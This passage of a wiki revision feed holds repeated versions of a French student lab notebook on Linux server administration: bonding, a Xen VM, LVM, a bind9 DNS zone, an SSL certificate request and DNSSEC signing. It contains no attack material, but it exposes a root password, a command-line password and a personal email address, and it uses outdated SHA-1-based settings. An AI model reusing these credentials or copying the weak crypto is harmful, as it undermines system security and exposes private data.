&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                        2              ; Serial&lt;br /&gt;
                        604800         ; Refresh&lt;br /&gt;
                         86400         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                        604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
         IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      NS      ns.faispastomberlasavo.net.&lt;br /&gt;
 ns      IN      A       193.48.57.161&lt;br /&gt;
 www     IN      A       193.48.57.161&lt;br /&gt;
 @       IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Commande:&lt;br /&gt;
 nslookup www.faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
Résultat:&lt;br /&gt;
 Server:		193.48.57.161&lt;br /&gt;
 Address:	193.48.57.161#53 &lt;br /&gt;
 &lt;br /&gt;
 Name:	www.faispastomberlasavo.net&lt;br /&gt;
 Address: 193.48.57.161&lt;br /&gt;
&lt;br /&gt;
=Séance6=&lt;br /&gt;
commande pour générer certificat SSL &lt;br /&gt;
 &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:France&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:faispastomberlasavo.net&lt;br /&gt;
 Email Address []:cedricduval94@gmail.com&lt;br /&gt;
&lt;br /&gt;
On ajoute le contenu du fichier serveur.csr dans gandi&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
DNSSEC&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-ksk.key&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-zsk.key&lt;br /&gt;
&lt;br /&gt;
 /etc/bind/faispastomberlasavo.net.dnssec# dnssec-signzone -o  faispastomberlasavo.net -k  faispastomberlasavo.net-ksk ../db. faispastomberlasavo.net faispastomberlasavo.net-zsk&lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.faispastomberlasavo.net.signed&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@Frotteman:/etc/bind# dig DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 &lt;br /&gt;
 ; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 ;; global options: +cmd&lt;br /&gt;
 ;; Got answer:&lt;br /&gt;
 ;; -&amp;gt;&amp;gt;HEADER&amp;lt;&amp;lt;- opcode: QUERY, status: NOERROR, id: 10598&lt;br /&gt;
 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
 &lt;br /&gt;
 ;; OPT PSEUDOSECTION:&lt;br /&gt;
 ; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
 ;; QUESTION SECTION:&lt;br /&gt;
 ;faispastomberlasavo.net.	IN	DNSKEY   &lt;br /&gt;
 &lt;br /&gt;
 ;; ANSWER SECTION:&lt;br /&gt;
 faispastomberlasavo.net. 604800	IN	DNSKEY	257 3 5 AwEAAa3Js66YHVQrw4q+4IKA71lRK9AXWznEZyoxVCxr0SSYx+TFUXxh VTbjq1H8aYjwUa1UyuFsHUC72wJcTNCo0DNOX6Qcek/Y9O30x8xnXRdB OsNFLhnc5v4b5mLTGLswS3GpBCgP8+xSj4LmZPrLZneVom5Q2xCl40KT b5WdpMXXmPjaPOk24gdr5QYzZxrSIqmbEjp2DPaCZiAqPJ8hvvqPFQ+Q Bq53a5/ra3PfN1uo0B2WzeGN0nsb3QDLAREmuovHxSJjm23Yv7rcU8eb txBuOPkbgyES/ybN0uWvW3hiHipXeMCa+yRywnle2Ea56k6w4bcPNta3 8qeF3KwqszE=&lt;br /&gt;
 faispastomberlasavo.net. 604800	IN	DNSKEY	256 3 5 AwEAAe+I1C2IYzY323K1HXia8curPC+ZduRAiXpsYMdBRyTQOpxTf0zf ulFh42UOPhRCrYm3CZkOesUjhbS0Z3WVzy6u/RHJDRKiqNUbpnBN8jQf mmhIx8FJU3Kcu5st+T6cRWOEoCQIS6tOM31u5I4NKrhXZamDiV361YTQ nJrJNT//&lt;br /&gt;
 &lt;br /&gt;
 ;; Query time: 0 msec&lt;br /&gt;
 ;; SERVER: 127.0.0.1#53(127.0.0.1)&lt;br /&gt;
 ;; WHEN: Mon Nov 28 17:05:19 CET 2016&lt;br /&gt;
 ;; MSG SIZE  rcvd: 476&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35474</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35474"/>
				<updated>2016-11-28T14:27:18Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Séance6 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Séance3=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                        2              ; Serial&lt;br /&gt;
                        604800         ; Refresh&lt;br /&gt;
                         86400         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                        604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
         IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      NS      ns.faispastomberlasavo.net.&lt;br /&gt;
 ns      IN      A       193.48.57.161&lt;br /&gt;
 www     IN      A       193.48.57.161&lt;br /&gt;
 @       IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Commande:&lt;br /&gt;
 nslookup www.faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
Résultat:&lt;br /&gt;
 Server:		193.48.57.161&lt;br /&gt;
 Address:	193.48.57.161#53 &lt;br /&gt;
 &lt;br /&gt;
 Name:	www.faispastomberlasavo.net&lt;br /&gt;
 Address: 193.48.57.161&lt;br /&gt;
&lt;br /&gt;
=Séance6=&lt;br /&gt;
commande pour générer certificat SSL &lt;br /&gt;
 &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:France&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:faispastomberlasavo.net&lt;br /&gt;
 Email Address []:cedricduval94@gmail.com&lt;br /&gt;
&lt;br /&gt;
On ajoute le contenu du fichier serveur.csr dans gandi&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
DNSSEC&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-ksk.key&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-zsk.key&lt;br /&gt;
&lt;br /&gt;
 /etc/bind/faispastomberlasavo.net.dnssec# dnssec-signzone -o  faispastomberlasavo.net -k  faispastomberlasavo.net-ksk ../db. faispastomberlasavo.net faispastomberlasavo.net-zsk&lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.faispastomberlasavo.net.signed&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35473</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35473"/>
				<updated>2016-11-28T14:26:50Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Séance6 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Séance3=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                        2              ; Serial&lt;br /&gt;
                        604800         ; Refresh&lt;br /&gt;
                         86400         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                        604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
         IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      NS      ns.faispastomberlasavo.net.&lt;br /&gt;
 ns      IN      A       193.48.57.161&lt;br /&gt;
 www     IN      A       193.48.57.161&lt;br /&gt;
 @       IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Commande:&lt;br /&gt;
 nslookup www.faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
Résultat:&lt;br /&gt;
 Server:		193.48.57.161&lt;br /&gt;
 Address:	193.48.57.161#53 &lt;br /&gt;
 &lt;br /&gt;
 Name:	www.faispastomberlasavo.net&lt;br /&gt;
 Address: 193.48.57.161&lt;br /&gt;
&lt;br /&gt;
=Séance6=&lt;br /&gt;
commande pour générer certificat SSL &lt;br /&gt;
 &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:France&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:faispastomberlasavo.net&lt;br /&gt;
 Email Address []:cedricduval94@gmail.com&lt;br /&gt;
&lt;br /&gt;
On ajoute le contenu du fichier serveur.csr dans gandi&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
DNSSEC&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
$include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-ksk.key&lt;br /&gt;
$include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-zsk.key&lt;br /&gt;
&lt;br /&gt;
/etc/bind/faispastomberlasavo.net.dnssec# dnssec-signzone -o  faispastomberlasavo.net -k  faispastomberlasavo.net-ksk ../db. faispastomberlasavo.net faispastomberlasavo.net-zsk&lt;br /&gt;
&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.faispastomberlasavo.net.signed&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35469</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35469"/>
				<updated>2016-11-28T13:50:18Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Séance6 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
